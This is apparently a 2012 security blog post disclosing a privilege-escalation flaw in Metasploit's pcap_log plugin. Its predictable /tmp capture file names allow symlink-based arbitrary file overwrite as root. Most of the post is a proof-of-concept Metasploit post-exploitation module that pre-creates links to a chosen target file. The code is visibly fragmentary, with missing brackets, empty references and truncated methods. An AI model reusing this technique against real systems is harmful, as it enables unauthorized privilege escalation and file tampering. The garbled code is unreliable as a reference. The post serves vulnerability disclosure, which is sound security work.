Monday, 16 July 2012

0A29-12-2 : Metasploit 'pcap_log' plugin privilege escalation vulnerability

UPDATED 29 October 2012

Finessed exploit now included in metasploit -

0A29-12-2 : Metasploit 'pcap_log' plugin  privilege escalation vulnerability

Author: 0a29406d9794e4f9b30b3c5d6702c708 - - GMail 0a2940


Metasploit plugin 'pcap_log' is vulnerable to an arbitrary file overwrite bug
which can further be leveraged to insert user-controlled data resulting in
potential escalation of privileges


16 July 2012 - Reported
16 July 2012 - Acknowledged & fixed by HD Moore
16 July 2012 - Public disclosure


By default the pcap_log plugin (plugins/pcap_log.rb) logs pcap to a file like
'/tmp/msf3-session_2012-07-16_15-15-35.pcap'. This is of course is
predictable so a simple 'ln' in advance to a privileged file will
result in arbitrary file overwrite. The module has to run as root.

Here's the fun part - by sending packets we can then insert our own
content into any file (surrounded by pcap headers and all
the other packets)

Sample PoC (needs work)


# $Id$

# ## This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.

require 'msf/core'
require 'rex'
require 'msf/core/post/common'
require 'msf/core/post/file'
require 'msf/core/post/linux/system'

class Metasploit3 < Msf::Post

    include Msf::Post::Common
    include Msf::Post::File
    include Msf::Post::Linux::System

    def initialize(info={})
        super( update_info( info,
                'Name'          => 'Metasploit plugin "pcap_log" arbirary file overwrite / privilege escalation',
                'Description'   => %q{ Post exploitation module to exploit 0A29-12-2, a vulnerability in metasploit pcap_log plugin.
                            Depending on the file you choose to overwrite, you will need to netcat/telnet etc. the data
                            that you wish to appear in the file.},
                'License'       => MSF_LICENSE,
                'Author'        => [ '0a29406d9794e4f9b30b3c5d6702c708'],
                'Version'       => '$Revision$',
                'Platform'      => [ 'linux' ],
                'SessionTypes'  => [ 'shell', 'meterpreter' ],
                'References' =>
                                        [ 'URL', '' ],
                                        [ 'URL', '' ]
                'DisclosureDate'=> "July 16 2012"

  'NUMBER', [true, 'Number of seconds to prime /tmp/ with', nil]),
              'FILE', [true, 'File to overwrite with PCAP data', nil]),
                ], self.class)


    def link(t)
        file_part = "%s_%04d-%02d-%02d_%02d-%02d-%02d.pcap" % [
                    "msf3-session", t.year, t.month, t.mday, t.hour, t.min, t.sec
                fname = ::File.join("/tmp", file_part)
        retval =  session.shell_command("/bin/ln #{datastore['FILE']} #{fname}")

    # Run Method for when run command is issued
    def run
        for i in 0..(datastore['NUMBER'])
        print_status("Set #{datastore['NUMBER']} links.")

    def cleanup
        print_status("Manual cleanup required: rm -f /tmp/msf3-session*")